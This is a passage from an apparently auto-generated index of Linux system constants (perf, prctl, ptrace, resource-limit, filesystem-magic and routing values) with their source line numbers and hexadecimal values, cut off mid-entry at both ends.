0x26 constant PERF_MEM_SNOOP_HIT (line 2368) | PERF_MEM_SNOOP_HIT = 0x4 constant PERF_MEM_SNOOP_HITM (line 2369) | PERF_MEM_SNOOP_HITM = 0x10 constant PERF_MEM_SNOOP_MISS (line 2370) | PERF_MEM_SNOOP_MISS = 0x8 constant PERF_MEM_SNOOP_NA (line 2371) | PERF_MEM_SNOOP_NA = 0x1 constant PERF_MEM_SNOOP_NONE (line 2372) | PERF_MEM_SNOOP_NONE = 0x2 constant PERF_MEM_SNOOP_SHIFT (line 2373) | PERF_MEM_SNOOP_SHIFT = 0x13 constant PERF_MEM_TLB_HIT (line 2374) | PERF_MEM_TLB_HIT = 0x2 constant PERF_MEM_TLB_L1 (line 2375) | PERF_MEM_TLB_L1 = 0x8 constant PERF_MEM_TLB_L2 (line 2376) | PERF_MEM_TLB_L2 = 0x10 constant PERF_MEM_TLB_MISS (line 2377) | PERF_MEM_TLB_MISS = 0x4 constant PERF_MEM_TLB_NA (line 2378) | PERF_MEM_TLB_NA = 0x1 constant PERF_MEM_TLB_OS (line 2379) | PERF_MEM_TLB_OS = 0x40 constant PERF_MEM_TLB_SHIFT (line 2380) | PERF_MEM_TLB_SHIFT = 0x1a constant PERF_MEM_TLB_WK (line 2381) | PERF_MEM_TLB_WK = 0x20 constant PERF_PMU_TYPE_SHIFT (line 2382) | PERF_PMU_TYPE_SHIFT = 0x20 constant PERF_RECORD_KSYMBOL_FLAGS_UNREGISTER (line 2383) | PERF_RECORD_KSYMBOL_FLAGS_UNREGISTER = 0x1 constant PERF_RECORD_MISC_COMM_EXEC (line 2384) | PERF_RECORD_MISC_COMM_EXEC = 0x2000 constant PERF_RECORD_MISC_CPUMODE_MASK (line 2385) | PERF_RECORD_MISC_CPUMODE_MASK = 0x7 constant PERF_RECORD_MISC_CPUMODE_UNKNOWN (line 2386) | PERF_RECORD_MISC_CPUMODE_UNKNOWN = 0x0 constant PERF_RECORD_MISC_EXACT_IP (line 2387) | PERF_RECORD_MISC_EXACT_IP = 0x4000 constant PERF_RECORD_MISC_EXT_RESERVED (line 2388) | PERF_RECORD_MISC_EXT_RESERVED = 0x8000 constant PERF_RECORD_MISC_FORK_EXEC (line 2389) | PERF_RECORD_MISC_FORK_EXEC = 0x2000 constant PERF_RECORD_MISC_GUEST_KERNEL (line 2390) | PERF_RECORD_MISC_GUEST_KERNEL = 0x4 constant PERF_RECORD_MISC_GUEST_USER (line 2391) | PERF_RECORD_MISC_GUEST_USER = 0x5 constant PERF_RECORD_MISC_HYPERVISOR (line 2392) | PERF_RECORD_MISC_HYPERVISOR = 0x3 constant PERF_RECORD_MISC_KERNEL (line 2393) | PERF_RECORD_MISC_KERNEL = 0x1 constant PERF_RECORD_MISC_MMAP_BUILD_ID (line 2394) | PERF_RECORD_MISC_MMAP_BUILD_ID = 0x4000 constant PERF_RECORD_MISC_MMAP_DATA (line 2395) | PERF_RECORD_MISC_MMAP_DATA = 0x2000 constant PERF_RECORD_MISC_PROC_MAP_PARSE_TIMEOUT (line 2396) | PERF_RECORD_MISC_PROC_MAP_PARSE_TIMEOUT = 0x1000 constant PERF_RECORD_MISC_SWITCH_OUT (line 2397) | PERF_RECORD_MISC_SWITCH_OUT = 0x2000 constant PERF_RECORD_MISC_SWITCH_OUT_PREEMPT (line 2398) | PERF_RECORD_MISC_SWITCH_OUT_PREEMPT = 0x4000 constant PERF_RECORD_MISC_USER (line 2399) | PERF_RECORD_MISC_USER = 0x2 constant PERF_SAMPLE_BRANCH_PLM_ALL (line 2400) | PERF_SAMPLE_BRANCH_PLM_ALL = 0x7 constant PERF_SAMPLE_WEIGHT_TYPE (line 2401) | PERF_SAMPLE_WEIGHT_TYPE = 0x1004000 constant PIPEFS_MAGIC (line 2402) | PIPEFS_MAGIC = 0x50495045 constant PPPIOCGNPMODE (line 2403) | PPPIOCGNPMODE = 0xc008744c constant PPPIOCNEWUNIT (line 2404) | PPPIOCNEWUNIT = 0xc004743e constant PRIO_PGRP (line 2405) | PRIO_PGRP = 0x1 constant PRIO_PROCESS (line 2406) | PRIO_PROCESS = 0x0 constant PRIO_USER (line 2407) | PRIO_USER = 0x2 constant PROC_SUPER_MAGIC (line 2408) | PROC_SUPER_MAGIC = 0x9fa0 constant PROT_EXEC (line 2409) | PROT_EXEC = 0x4 constant PROT_GROWSDOWN (line 2410) | PROT_GROWSDOWN = 0x1000000 constant PROT_GROWSUP (line 2411) | PROT_GROWSUP = 0x2000000 constant PROT_NONE (line 2412) | PROT_NONE = 0x0 constant PROT_READ (line 2413) | PROT_READ = 0x1 constant PROT_WRITE (line 2414) | PROT_WRITE = 0x2 constant PR_CAPBSET_DROP (line 2415) | PR_CAPBSET_DROP = 0x18 constant PR_CAPBSET_READ (line 2416) | PR_CAPBSET_READ = 0x17 constant PR_CAP_AMBIENT (line 2417) | PR_CAP_AMBIENT = 0x2f constant PR_CAP_AMBIENT_CLEAR_ALL (line 2418) | PR_CAP_AMBIENT_CLEAR_ALL = 0x4 constant PR_CAP_AMBIENT_IS_SET (line 2419) | PR_CAP_AMBIENT_IS_SET = 0x1 constant PR_CAP_AMBIENT_LOWER (line 2420) | PR_CAP_AMBIENT_LOWER = 0x3 constant PR_CAP_AMBIENT_RAISE (line 2421) | PR_CAP_AMBIENT_RAISE = 0x2 constant PR_ENDIAN_BIG (line 2422) | PR_ENDIAN_BIG = 0x0 constant PR_ENDIAN_LITTLE (line 2423) | PR_ENDIAN_LITTLE = 0x1 constant PR_ENDIAN_PPC_LITTLE (line 2424) | PR_ENDIAN_PPC_LITTLE = 0x2 constant PR_FPEMU_NOPRINT (line 2425) | PR_FPEMU_NOPRINT = 0x1 constant PR_FPEMU_SIGFPE (line 2426) | PR_FPEMU_SIGFPE = 0x2 constant PR_FP_EXC_ASYNC (line 2427) | PR_FP_EXC_ASYNC = 0x2 constant PR_FP_EXC_DISABLED (line 2428) | PR_FP_EXC_DISABLED = 0x0 constant PR_FP_EXC_DIV (line 2429) | PR_FP_EXC_DIV = 0x10000 constant PR_FP_EXC_INV (line 2430) | PR_FP_EXC_INV = 0x100000 constant PR_FP_EXC_NONRECOV (line 2431) | PR_FP_EXC_NONRECOV = 0x1 constant PR_FP_EXC_OVF (line 2432) | PR_FP_EXC_OVF = 0x20000 constant PR_FP_EXC_PRECISE (line 2433) | PR_FP_EXC_PRECISE = 0x3 constant PR_FP_EXC_RES (line 2434) | PR_FP_EXC_RES = 0x80000 constant PR_FP_EXC_SW_ENABLE (line 2435) | PR_FP_EXC_SW_ENABLE = 0x80 constant PR_FP_EXC_UND (line 2436) | PR_FP_EXC_UND = 0x40000 constant PR_FP_MODE_FR (line 2437) | PR_FP_MODE_FR = 0x1 constant PR_FP_MODE_FRE (line 2438) | PR_FP_MODE_FRE = 0x2 constant PR_GET_AUXV (line 2439) | PR_GET_AUXV = 0x41555856 constant PR_GET_CHILD_SUBREAPER (line 2440) | PR_GET_CHILD_SUBREAPER = 0x25 constant PR_GET_DUMPABLE (line 2441) | PR_GET_DUMPABLE = 0x3 constant PR_GET_ENDIAN (line 2442) | PR_GET_ENDIAN = 0x13 constant PR_GET_FPEMU (line 2443) | PR_GET_FPEMU = 0x9 constant PR_GET_FPEXC (line 2444) | PR_GET_FPEXC = 0xb constant PR_GET_FP_MODE (line 2445) | PR_GET_FP_MODE = 0x2e constant PR_GET_IO_FLUSHER (line 2446) | PR_GET_IO_FLUSHER = 0x3a constant PR_GET_KEEPCAPS (line 2447) | PR_GET_KEEPCAPS = 0x7 constant PR_GET_MDWE (line 2448) | PR_GET_MDWE = 0x42 constant PR_GET_MEMORY_MERGE (line 2449) | PR_GET_MEMORY_MERGE = 0x44 constant PR_GET_NAME (line 2450) | PR_GET_NAME = 0x10 constant PR_GET_NO_NEW_PRIVS (line 2451) | PR_GET_NO_NEW_PRIVS = 0x27 constant PR_GET_PDEATHSIG (line 2452) | PR_GET_PDEATHSIG = 0x2 constant PR_GET_SECCOMP (line 2453) | PR_GET_SECCOMP = 0x15 constant PR_GET_SECUREBITS (line 2454) | PR_GET_SECUREBITS = 0x1b constant PR_GET_SPECULATION_CTRL (line 2455) | PR_GET_SPECULATION_CTRL = 0x34 constant PR_GET_TAGGED_ADDR_CTRL (line 2456) | PR_GET_TAGGED_ADDR_CTRL = 0x38 constant PR_GET_THP_DISABLE (line 2457) | PR_GET_THP_DISABLE = 0x2a constant PR_GET_TID_ADDRESS (line 2458) | PR_GET_TID_ADDRESS = 0x28 constant PR_GET_TIMERSLACK (line 2459) | PR_GET_TIMERSLACK = 0x1e constant PR_GET_TIMING (line 2460) | PR_GET_TIMING = 0xd constant PR_GET_TSC (line 2461) | PR_GET_TSC = 0x19 constant PR_GET_UNALIGN (line 2462) | PR_GET_UNALIGN = 0x5 constant PR_MCE_KILL (line 2463) | PR_MCE_KILL = 0x21 constant PR_MCE_KILL_CLEAR (line 2464) | PR_MCE_KILL_CLEAR = 0x0 constant PR_MCE_KILL_DEFAULT (line 2465) | PR_MCE_KILL_DEFAULT = 0x2 constant PR_MCE_KILL_EARLY (line 2466) | PR_MCE_KILL_EARLY = 0x1 constant PR_MCE_KILL_GET (line 2467) | PR_MCE_KILL_GET = 0x22 constant PR_MCE_KILL_LATE (line 2468) | PR_MCE_KILL_LATE = 0x0 constant PR_MCE_KILL_SET (line 2469) | PR_MCE_KILL_SET = 0x1 constant PR_MDWE_NO_INHERIT (line 2470) | PR_MDWE_NO_INHERIT = 0x2 constant PR_MDWE_REFUSE_EXEC_GAIN (line 2471) | PR_MDWE_REFUSE_EXEC_GAIN = 0x1 constant PR_MPX_DISABLE_MANAGEMENT (line 2472) | PR_MPX_DISABLE_MANAGEMENT = 0x2c constant PR_MPX_ENABLE_MANAGEMENT (line 2473) | PR_MPX_ENABLE_MANAGEMENT = 0x2b constant PR_MTE_TAG_MASK (line 2474) | PR_MTE_TAG_MASK = 0x7fff8 constant PR_MTE_TAG_SHIFT (line 2475) | PR_MTE_TAG_SHIFT = 0x3 constant PR_MTE_TCF_ASYNC (line 2476) | PR_MTE_TCF_ASYNC = 0x4 constant PR_MTE_TCF_MASK (line 2477) | PR_MTE_TCF_MASK = 0x6 constant PR_MTE_TCF_NONE (line 2478) | PR_MTE_TCF_NONE = 0x0 constant PR_MTE_TCF_SHIFT (line 2479) | PR_MTE_TCF_SHIFT = 0x1 constant PR_MTE_TCF_SYNC (line 2480) | PR_MTE_TCF_SYNC = 0x2 constant PR_PAC_APDAKEY (line 2481) | PR_PAC_APDAKEY = 0x4 constant PR_PAC_APDBKEY (line 2482) | PR_PAC_APDBKEY = 0x8 constant PR_PAC_APGAKEY (line 2483) | PR_PAC_APGAKEY = 0x10 constant PR_PAC_APIAKEY (line 2484) | PR_PAC_APIAKEY = 0x1 constant PR_PAC_APIBKEY (line 2485) | PR_PAC_APIBKEY = 0x2 constant PR_PAC_GET_ENABLED_KEYS (line 2486) | PR_PAC_GET_ENABLED_KEYS = 0x3d constant PR_PAC_RESET_KEYS (line 2487) | PR_PAC_RESET_KEYS = 0x36 constant PR_PAC_SET_ENABLED_KEYS (line 2488) | PR_PAC_SET_ENABLED_KEYS = 0x3c constant PR_RISCV_V_GET_CONTROL (line 2489) | PR_RISCV_V_GET_CONTROL = 0x46 constant PR_RISCV_V_SET_CONTROL (line 2490) | PR_RISCV_V_SET_CONTROL = 0x45 constant PR_RISCV_V_VSTATE_CTRL_CUR_MASK (line 2491) | PR_RISCV_V_VSTATE_CTRL_CUR_MASK = 0x3 constant PR_RISCV_V_VSTATE_CTRL_DEFAULT (line 2492) | PR_RISCV_V_VSTATE_CTRL_DEFAULT = 0x0 constant PR_RISCV_V_VSTATE_CTRL_INHERIT (line 2493) | PR_RISCV_V_VSTATE_CTRL_INHERIT = 0x10 constant PR_RISCV_V_VSTATE_CTRL_MASK (line 2494) | PR_RISCV_V_VSTATE_CTRL_MASK = 0x1f constant PR_RISCV_V_VSTATE_CTRL_NEXT_MASK (line 2495) | PR_RISCV_V_VSTATE_CTRL_NEXT_MASK = 0xc constant PR_RISCV_V_VSTATE_CTRL_OFF (line 2496) | PR_RISCV_V_VSTATE_CTRL_OFF = 0x1 constant PR_RISCV_V_VSTATE_CTRL_ON (line 2497) | PR_RISCV_V_VSTATE_CTRL_ON = 0x2 constant PR_SCHED_CORE (line 2498) | PR_SCHED_CORE = 0x3e constant PR_SCHED_CORE_CREATE (line 2499) | PR_SCHED_CORE_CREATE = 0x1 constant PR_SCHED_CORE_GET (line 2500) | PR_SCHED_CORE_GET = 0x0 constant PR_SCHED_CORE_MAX (line 2501) | PR_SCHED_CORE_MAX = 0x4 constant PR_SCHED_CORE_SCOPE_PROCESS_GROUP (line 2502) | PR_SCHED_CORE_SCOPE_PROCESS_GROUP = 0x2 constant PR_SCHED_CORE_SCOPE_THREAD (line 2503) | PR_SCHED_CORE_SCOPE_THREAD = 0x0 constant PR_SCHED_CORE_SCOPE_THREAD_GROUP (line 2504) | PR_SCHED_CORE_SCOPE_THREAD_GROUP = 0x1 constant PR_SCHED_CORE_SHARE_FROM (line 2505) | PR_SCHED_CORE_SHARE_FROM = 0x3 constant PR_SCHED_CORE_SHARE_TO (line 2506) | PR_SCHED_CORE_SHARE_TO = 0x2 constant PR_SET_CHILD_SUBREAPER (line 2507) | PR_SET_CHILD_SUBREAPER = 0x24 constant PR_SET_DUMPABLE (line 2508) | PR_SET_DUMPABLE = 0x4 constant PR_SET_ENDIAN (line 2509) | PR_SET_ENDIAN = 0x14 constant PR_SET_FPEMU (line 2510) | PR_SET_FPEMU = 0xa constant PR_SET_FPEXC (line 2511) | PR_SET_FPEXC = 0xc constant PR_SET_FP_MODE (line 2512) | PR_SET_FP_MODE = 0x2d constant PR_SET_IO_FLUSHER (line 2513) | PR_SET_IO_FLUSHER = 0x39 constant PR_SET_KEEPCAPS (line 2514) | PR_SET_KEEPCAPS = 0x8 constant PR_SET_MDWE (line 2515) | PR_SET_MDWE = 0x41 constant PR_SET_MEMORY_MERGE (line 2516) | PR_SET_MEMORY_MERGE = 0x43 constant PR_SET_MM (line 2517) | PR_SET_MM = 0x23 constant PR_SET_MM_ARG_END (line 2518) | PR_SET_MM_ARG_END = 0x9 constant PR_SET_MM_ARG_START (line 2519) | PR_SET_MM_ARG_START = 0x8 constant PR_SET_MM_AUXV (line 2520) | PR_SET_MM_AUXV = 0xc constant PR_SET_MM_BRK (line 2521) | PR_SET_MM_BRK = 0x7 constant PR_SET_MM_END_CODE (line 2522) | PR_SET_MM_END_CODE = 0x2 constant PR_SET_MM_END_DATA (line 2523) | PR_SET_MM_END_DATA = 0x4 constant PR_SET_MM_ENV_END (line 2524) | PR_SET_MM_ENV_END = 0xb constant PR_SET_MM_ENV_START (line 2525) | PR_SET_MM_ENV_START = 0xa constant PR_SET_MM_EXE_FILE (line 2526) | PR_SET_MM_EXE_FILE = 0xd constant PR_SET_MM_MAP (line 2527) | PR_SET_MM_MAP = 0xe constant PR_SET_MM_MAP_SIZE (line 2528) | PR_SET_MM_MAP_SIZE = 0xf constant PR_SET_MM_START_BRK (line 2529) | PR_SET_MM_START_BRK = 0x6 constant PR_SET_MM_START_CODE (line 2530) | PR_SET_MM_START_CODE = 0x1 constant PR_SET_MM_START_DATA (line 2531) | PR_SET_MM_START_DATA = 0x3 constant PR_SET_MM_START_STACK (line 2532) | PR_SET_MM_START_STACK = 0x5 constant PR_SET_NAME (line 2533) | PR_SET_NAME = 0xf constant PR_SET_NO_NEW_PRIVS (line 2534) | PR_SET_NO_NEW_PRIVS = 0x26 constant PR_SET_PDEATHSIG (line 2535) | PR_SET_PDEATHSIG = 0x1 constant PR_SET_PTRACER (line 2536) | PR_SET_PTRACER = 0x59616d61 constant PR_SET_SECCOMP (line 2537) | PR_SET_SECCOMP = 0x16 constant PR_SET_SECUREBITS (line 2538) | PR_SET_SECUREBITS = 0x1c constant PR_SET_SPECULATION_CTRL (line 2539) | PR_SET_SPECULATION_CTRL = 0x35 constant PR_SET_SYSCALL_USER_DISPATCH (line 2540) | PR_SET_SYSCALL_USER_DISPATCH = 0x3b constant PR_SET_TAGGED_ADDR_CTRL (line 2541) | PR_SET_TAGGED_ADDR_CTRL = 0x37 constant PR_SET_THP_DISABLE (line 2542) | PR_SET_THP_DISABLE = 0x29 constant PR_SET_TIMERSLACK (line 2543) | PR_SET_TIMERSLACK = 0x1d constant PR_SET_TIMING (line 2544) | PR_SET_TIMING = 0xe constant PR_SET_TSC (line 2545) | PR_SET_TSC = 0x1a constant PR_SET_UNALIGN (line 2546) | PR_SET_UNALIGN = 0x6 constant PR_SET_VMA (line 2547) | PR_SET_VMA = 0x53564d41 constant PR_SET_VMA_ANON_NAME (line 2548) | PR_SET_VMA_ANON_NAME = 0x0 constant PR_SME_GET_VL (line 2549) | PR_SME_GET_VL = 0x40 constant PR_SME_SET_VL (line 2550) | PR_SME_SET_VL = 0x3f constant PR_SME_SET_VL_ONEXEC (line 2551) | PR_SME_SET_VL_ONEXEC = 0x40000 constant PR_SME_VL_INHERIT (line 2552) | PR_SME_VL_INHERIT = 0x20000 constant PR_SME_VL_LEN_MASK (line 2553) | PR_SME_VL_LEN_MASK = 0xffff constant PR_SPEC_DISABLE (line 2554) | PR_SPEC_DISABLE = 0x4 constant PR_SPEC_DISABLE_NOEXEC (line 2555) | PR_SPEC_DISABLE_NOEXEC = 0x10 constant PR_SPEC_ENABLE (line 2556) | PR_SPEC_ENABLE = 0x2 constant PR_SPEC_FORCE_DISABLE (line 2557) | PR_SPEC_FORCE_DISABLE = 0x8 constant PR_SPEC_INDIRECT_BRANCH (line 2558) | PR_SPEC_INDIRECT_BRANCH = 0x1 constant PR_SPEC_L1D_FLUSH (line 2559) | PR_SPEC_L1D_FLUSH = 0x2 constant PR_SPEC_NOT_AFFECTED (line 2560) | PR_SPEC_NOT_AFFECTED = 0x0 constant PR_SPEC_PRCTL (line 2561) | PR_SPEC_PRCTL = 0x1 constant PR_SPEC_STORE_BYPASS (line 2562) | PR_SPEC_STORE_BYPASS = 0x0 constant PR_SVE_GET_VL (line 2563) | PR_SVE_GET_VL = 0x33 constant PR_SVE_SET_VL (line 2564) | PR_SVE_SET_VL = 0x32 constant PR_SVE_SET_VL_ONEXEC (line 2565) | PR_SVE_SET_VL_ONEXEC = 0x40000 constant PR_SVE_VL_INHERIT (line 2566) | PR_SVE_VL_INHERIT = 0x20000 constant PR_SVE_VL_LEN_MASK (line 2567) | PR_SVE_VL_LEN_MASK = 0xffff constant PR_SYS_DISPATCH_OFF (line 2568) | PR_SYS_DISPATCH_OFF = 0x0 constant PR_SYS_DISPATCH_ON (line 2569) | PR_SYS_DISPATCH_ON = 0x1 constant PR_TAGGED_ADDR_ENABLE (line 2570) | PR_TAGGED_ADDR_ENABLE = 0x1 constant PR_TASK_PERF_EVENTS_DISABLE (line 2571) | PR_TASK_PERF_EVENTS_DISABLE = 0x1f constant PR_TASK_PERF_EVENTS_ENABLE (line 2572) | PR_TASK_PERF_EVENTS_ENABLE = 0x20 constant PR_TIMING_STATISTICAL (line 2573) | PR_TIMING_STATISTICAL = 0x0 constant PR_TIMING_TIMESTAMP (line 2574) | PR_TIMING_TIMESTAMP = 0x1 constant PR_TSC_ENABLE (line 2575) | PR_TSC_ENABLE = 0x1 constant PR_TSC_SIGSEGV (line 2576) | PR_TSC_SIGSEGV = 0x2 constant PR_UNALIGN_NOPRINT (line 2577) | PR_UNALIGN_NOPRINT = 0x1 constant PR_UNALIGN_SIGBUS (line 2578) | PR_UNALIGN_SIGBUS = 0x2 constant PSTOREFS_MAGIC (line 2579) | PSTOREFS_MAGIC = 0x6165676c constant PTRACE_ATTACH (line 2580) | PTRACE_ATTACH = 0x10 constant PTRACE_CONT (line 2581) | PTRACE_CONT = 0x7 constant PTRACE_DETACH (line 2582) | PTRACE_DETACH = 0x11 constant PTRACE_EVENTMSG_SYSCALL_ENTRY (line 2583) | PTRACE_EVENTMSG_SYSCALL_ENTRY = 0x1 constant PTRACE_EVENTMSG_SYSCALL_EXIT (line 2584) | PTRACE_EVENTMSG_SYSCALL_EXIT = 0x2 constant PTRACE_EVENT_CLONE (line 2585) | PTRACE_EVENT_CLONE = 0x3 constant PTRACE_EVENT_EXEC (line 2586) | PTRACE_EVENT_EXEC = 0x4 constant PTRACE_EVENT_EXIT (line 2587) | PTRACE_EVENT_EXIT = 0x6 constant PTRACE_EVENT_FORK (line 2588) | PTRACE_EVENT_FORK = 0x1 constant PTRACE_EVENT_SECCOMP (line 2589) | PTRACE_EVENT_SECCOMP = 0x7 constant PTRACE_EVENT_STOP (line 2590) | PTRACE_EVENT_STOP = 0x80 constant PTRACE_EVENT_VFORK (line 2591) | PTRACE_EVENT_VFORK = 0x2 constant PTRACE_EVENT_VFORK_DONE (line 2592) | PTRACE_EVENT_VFORK_DONE = 0x5 constant PTRACE_GETEVENTMSG (line 2593) | PTRACE_GETEVENTMSG = 0x4201 constant PTRACE_GETREGS (line 2594) | PTRACE_GETREGS = 0xc constant PTRACE_GETREGSET (line 2595) | PTRACE_GETREGSET = 0x4204 constant PTRACE_GETSIGINFO (line 2596) | PTRACE_GETSIGINFO = 0x4202 constant PTRACE_GETSIGMASK (line 2597) | PTRACE_GETSIGMASK = 0x420a constant PTRACE_GET_RSEQ_CONFIGURATION (line 2598) | PTRACE_GET_RSEQ_CONFIGURATION = 0x420f constant PTRACE_GET_SYSCALL_INFO (line 2599) | PTRACE_GET_SYSCALL_INFO = 0x420e constant PTRACE_GET_SYSCALL_USER_DISPATCH_CONFIG (line 2600) | PTRACE_GET_SYSCALL_USER_DISPATCH_CONFIG = 0x4211 constant PTRACE_INTERRUPT (line 2601) | PTRACE_INTERRUPT = 0x4207 constant PTRACE_KILL (line 2602) | PTRACE_KILL = 0x8 constant PTRACE_LISTEN (line 2603) | PTRACE_LISTEN = 0x4208 constant PTRACE_O_EXITKILL (line 2604) | PTRACE_O_EXITKILL = 0x100000 constant PTRACE_O_MASK (line 2605) | PTRACE_O_MASK = 0x3000ff constant PTRACE_O_SUSPEND_SECCOMP (line 2606) | PTRACE_O_SUSPEND_SECCOMP = 0x200000 constant PTRACE_O_TRACECLONE (line 2607) | PTRACE_O_TRACECLONE = 0x8 constant PTRACE_O_TRACEEXEC (line 2608) | PTRACE_O_TRACEEXEC = 0x10 constant PTRACE_O_TRACEEXIT (line 2609) | PTRACE_O_TRACEEXIT = 0x40 constant PTRACE_O_TRACEFORK (line 2610) | PTRACE_O_TRACEFORK = 0x2 constant PTRACE_O_TRACESECCOMP (line 2611) | PTRACE_O_TRACESECCOMP = 0x80 constant PTRACE_O_TRACESYSGOOD (line 2612) | PTRACE_O_TRACESYSGOOD = 0x1 constant PTRACE_O_TRACEVFORK (line 2613) | PTRACE_O_TRACEVFORK = 0x4 constant PTRACE_O_TRACEVFORKDONE (line 2614) | PTRACE_O_TRACEVFORKDONE = 0x20 constant PTRACE_PEEKDATA (line 2615) | PTRACE_PEEKDATA = 0x2 constant PTRACE_PEEKSIGINFO (line 2616) | PTRACE_PEEKSIGINFO = 0x4209 constant PTRACE_PEEKSIGINFO_SHARED (line 2617) | PTRACE_PEEKSIGINFO_SHARED = 0x1 constant PTRACE_PEEKTEXT (line 2618) | PTRACE_PEEKTEXT = 0x1 constant PTRACE_PEEKUSR (line 2619) | PTRACE_PEEKUSR = 0x3 constant PTRACE_POKEDATA (line 2620) | PTRACE_POKEDATA = 0x5 constant PTRACE_POKETEXT (line 2621) | PTRACE_POKETEXT = 0x4 constant PTRACE_POKEUSR (line 2622) | PTRACE_POKEUSR = 0x6 constant PTRACE_SECCOMP_GET_FILTER (line 2623) | PTRACE_SECCOMP_GET_FILTER = 0x420c constant PTRACE_SECCOMP_GET_METADATA (line 2624) | PTRACE_SECCOMP_GET_METADATA = 0x420d constant PTRACE_SEIZE (line 2625) | PTRACE_SEIZE = 0x4206 constant PTRACE_SETOPTIONS (line 2626) | PTRACE_SETOPTIONS = 0x4200 constant PTRACE_SETREGS (line 2627) | PTRACE_SETREGS = 0xd constant PTRACE_SETREGSET (line 2628) | PTRACE_SETREGSET = 0x4205 constant PTRACE_SETSIGINFO (line 2629) | PTRACE_SETSIGINFO = 0x4203 constant PTRACE_SETSIGMASK (line 2630) | PTRACE_SETSIGMASK = 0x420b constant PTRACE_SET_SYSCALL_USER_DISPATCH_CONFIG (line 2631) | PTRACE_SET_SYSCALL_USER_DISPATCH_CONFIG = 0x4210 constant PTRACE_SINGLESTEP (line 2632) | PTRACE_SINGLESTEP = 0x9 constant PTRACE_SYSCALL (line 2633) | PTRACE_SYSCALL = 0x18 constant PTRACE_SYSCALL_INFO_ENTRY (line 2634) | PTRACE_SYSCALL_INFO_ENTRY = 0x1 constant PTRACE_SYSCALL_INFO_EXIT (line 2635) | PTRACE_SYSCALL_INFO_EXIT = 0x2 constant PTRACE_SYSCALL_INFO_NONE (line 2636) | PTRACE_SYSCALL_INFO_NONE = 0x0 constant PTRACE_SYSCALL_INFO_SECCOMP (line 2637) | PTRACE_SYSCALL_INFO_SECCOMP = 0x3 constant PTRACE_TRACEME (line 2638) | PTRACE_TRACEME = 0x0 constant P_ALL (line 2639) | P_ALL = 0x0 constant P_PGID (line 2640) | P_PGID = 0x2 constant P_PID (line 2641) | P_PID = 0x1 constant P_PIDFD (line 2642) | P_PIDFD = 0x3 constant QNX4_SUPER_MAGIC (line 2643) | QNX4_SUPER_MAGIC = 0x2f constant QNX6_SUPER_MAGIC (line 2644) | QNX6_SUPER_MAGIC = 0x68191122 constant RAMFS_MAGIC (line 2645) | RAMFS_MAGIC = 0x858458f6 constant RAW_PAYLOAD_DIGITAL (line 2646) | RAW_PAYLOAD_DIGITAL = 0x3 constant RAW_PAYLOAD_HCI (line 2647) | RAW_PAYLOAD_HCI = 0x2 constant RAW_PAYLOAD_LLCP (line 2648) | RAW_PAYLOAD_LLCP = 0x0 constant RAW_PAYLOAD_NCI (line 2649) | RAW_PAYLOAD_NCI = 0x1 constant RAW_PAYLOAD_PROPRIETARY (line 2650) | RAW_PAYLOAD_PROPRIETARY = 0x4 constant RDTGROUP_SUPER_MAGIC (line 2651) | RDTGROUP_SUPER_MAGIC = 0x7655821 constant REISERFS_SUPER_MAGIC (line 2652) | REISERFS_SUPER_MAGIC = 0x52654973 constant RENAME_EXCHANGE (line 2653) | RENAME_EXCHANGE = 0x2 constant RENAME_NOREPLACE (line 2654) | RENAME_NOREPLACE = 0x1 constant RENAME_WHITEOUT (line 2655) | RENAME_WHITEOUT = 0x4 constant RLIMIT_CORE (line 2656) | RLIMIT_CORE = 0x4 constant RLIMIT_CPU (line 2657) | RLIMIT_CPU = 0x0 constant RLIMIT_DATA (line 2658) | RLIMIT_DATA = 0x2 constant RLIMIT_FSIZE (line 2659) | RLIMIT_FSIZE = 0x1 constant RLIMIT_LOCKS (line 2660) | RLIMIT_LOCKS = 0xa constant RLIMIT_MSGQUEUE (line 2661) | RLIMIT_MSGQUEUE = 0xc constant RLIMIT_NICE (line 2662) | RLIMIT_NICE = 0xd constant RLIMIT_RTPRIO (line 2663) | RLIMIT_RTPRIO = 0xe constant RLIMIT_RTTIME (line 2664) | RLIMIT_RTTIME = 0xf constant RLIMIT_SIGPENDING (line 2665) | RLIMIT_SIGPENDING = 0xb constant RLIMIT_STACK (line 2666) | RLIMIT_STACK = 0x3 constant RLIM_INFINITY (line 2667) | RLIM_INFINITY = 0xffffffffffffffff constant RTAX_ADVMSS (line 2668) | RTAX_ADVMSS = 0x8 constant RTAX_CC_ALGO (line 2669) | RTAX_CC_ALGO = 0x10 constant RTAX_CWND (line 2670) | RTAX_CWND = 0x7 constant RTAX_FASTOPEN_NO_COOKIE (line 2671) | RTAX_FASTOPEN_NO_COOKIE = 0x11 constant RTAX_FEATURES (line 2672) | RTAX_FEATURES = 0xc constant RTAX_FEATURE_ALLFRAG (line 2673) | RTAX_FEATURE_ALLFRAG = 0x8 constant RTAX_FEATURE_ECN (line 2674) | RTAX_FEATURE_ECN = 0x1 constant RTAX_FEATURE_MASK (line 2675) | RTAX_FEATURE_MASK = 0x1f constant RTAX_FEATURE_SACK (line 2676) | RTAX_FEATURE_SACK = 0x2 constant RTAX_FEATURE_TCP_USEC_TS (line 2677) | RTAX_FEATURE_TCP_USEC_TS = 0x10 constant RTAX_FEATURE_TIMESTAMP (line 2678) | RTAX_FEATURE_TIMESTAMP = 0x4 constant RTAX_HOPLIMIT (line 2679) | RTAX_HOPLIMIT = 0xa constant RTAX_INITCWND (line 2680) | RTAX_INITCWND = 0xb constant RTAX_INITRWND (line 2681) | RTAX_INITRWND = 0xe constant RTAX_LOCK (line 2682) | RTAX_LOCK = 0x1 constant RTAX_MAX (line 2683) | RTAX_MAX = 0x11 constant RTAX_MTU (line 2684) | RTAX_MTU = 0x2 constant RTAX_QUICKACK (line 2685) | RTAX_QUICKACK = 0xf constant RTAX_REORDERING (line 2686) | RTAX_REORDERING = 0x9 constant RTAX_RTO_MIN (line 2687) | RTAX_RTO_MIN = 0xd constant RTAX_RTT (line 2688) | RTAX_RTT = 0x4 constant RTAX_RTTVAR (line 2689) | RTAX_RTTVAR = 0x5 constant RTAX_SSTHRESH (line 2690) | RTAX_SSTHRESH = 0x6 constant RTAX_UNSPEC (line 2691) | RTAX_UNSPEC = 0x0 constant RTAX_WINDOW (line 2692) | RTAX_WINDOW = 0x3 constant RTA_ALIGNTO (line 2693) | RTA_ALIGNTO = 0x4 constant RTA_MAX (line 2694) | RTA_MAX = 0x1e constant RTCF_DIRECTSRC (line 2695) | RTCF_DIRECTSRC = 0x4000000 constant RTCF_DOREDIRECT (line 2696) | RTCF_DOREDIRECT = 0x1000000 constant RTCF_LOG (line 2697) | RTCF_LOG = 0x2000000 constant 